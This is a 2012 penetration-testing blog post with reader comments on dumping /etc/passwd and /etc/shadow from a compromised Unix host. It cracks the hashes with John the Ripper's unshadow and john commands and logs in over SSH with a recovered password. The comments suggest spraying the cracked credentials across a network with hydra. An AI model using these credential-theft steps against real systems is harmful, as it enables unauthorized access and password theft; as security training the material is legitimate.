Dumping And Cracking Unix Password Hashes

23 Jul

One of the first post exploitation activities when we have compromised a target is to obtain the passwords hashes in order to crack them offline.If we managed to crack the hashes then we might be able to escalate our privileges and to gain administrative access especially if we have cracked the administrator’s hash.In this tutorial we will see how to obtain and crack password hashes from a Unix box.

Lets say that we have exploited a vulnerability and we have gained a remote shell to our target.The next step is to see the directories and files that exist on the remote system with the command ls.

Directories of the remote system


The next step is to read the /etc/passwd file which contains all the accounts of the remote system.The next image is showing the list of the local accounts of the machine that we have compromised.Lets analyse the information that we can obtain from the first account which is root.The first field indicates the username,the field x means that the password is encrypted and it is stored on the /etc/shadow file.The number 0 means that this the userID which for root accounts is always zero and the next 0 is the groupID.Next we can see the root where we can find any extra information about the user (in this case there is no other extra information) and the last two fields /root and /bin/bash are the user home directory and the command shell.

Reading the /etc/passwd file


Now that we have the list with the accounts of the remote system we can save that list in a file for later use which it will be called passwords.txt.The next step is to obtain the passwords hashes.As we know in unix systems the password hashes are stored in the /etc/shadow location so we will run the command cat /etc/shadow in order to see them.

Reading the password hashes of the target


So we will save the hashes as well in a file called shadow.txt and we will use the famous password cracker john the ripper in order to crack those hashes.In backtrack john the ripper is located in the following path: /pentest/passwords/john.

john the ripper directory


From the above image we can see all the files that the directory john contains.In that list there is a utility called unshadow.We will run this utility in order to be able to read the shadow file before we try to crack it.So we will need to execute the command ./unshadow /root/Desktop/Cracking/passwords.txt /root/Desktop/Cracking/shadow.txt > /root/Desktop/Cracking/cracked.txt

This command will combine the two files that we have created before into a single file called cracked.txt.Now we are ready to crack those hashes with the command ./john /root/Desktop/Cracking/cracked.txt.As we can see john the ripper cracked easily those password hashes so now we have all the usernames and passwords from our target.

Cracked passwords


If we want to see the passwords that we cracked we can run the show command from john.For example ./john –show /root/Desktop/Cracking/cracked.txt

Display all passwords of the target


Now that we have all the passwords we can use them in order to connect remotely to our target.For example if our target is running an SSH server then we use that service.In this specific example we will connect under the username sys.The password for the sys account is batman as we have discovered it previously.

Connection through SSH



In this article we saw how to obtain and crack the password hashes of the remote system.In penetration testing engagements if we manage to crack a password hash from the target then we have a valid account which will allow us to have permanent access to the box.So obtaining and cracking the hashes it should be one of the first post exploitation activities as penetration testers.


Posted by on July 23, 2012 in Post Exploitation


Tags: , , ,

5 responses to “Dumping And Cracking Unix Password Hashes

  1. Bryan Miller

    July 23, 2012 at 9:30 am

    You forgot to mention that you must be “root” equivalent to dump the /etc/shadow file. If you have that privilege already you don’t really need to dump and crack the passwords.

    • shellnobi

      July 23, 2012 at 4:31 pm

      You still need to crack the passwords, as in many cases, weak password credentials are reused within the network and can assist the penetration tester in pivoting to other machines. If you’re attacking several machines in an internal network and you manage to crack several passwords, you can easily fire up a tool like hydra to quickly attempt a login for a cracked user account across the network.

  2. netbiosX

    July 23, 2012 at 9:54 am

    You are right Bryan!You need to be root in order to read the /etc/shadow.However I will not agree with you that there is no need to dump and crack passwords because you will need that in order to discover alternative routes for access on the remote machine.

  3. James

    August 3, 2014 at 10:36 pm

    If you already have root access on the target how do you dump it’s shadow file and passwd file to your attack server so you’re able to run John against the two files? Don’t you need to copy them to your machine to run John against them?

    • James

      August 3, 2014 at 10:38 pm

      I would assume you need to establish more than an SSH connection to the target to copy files from it back to your attack server. Is that correct?


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: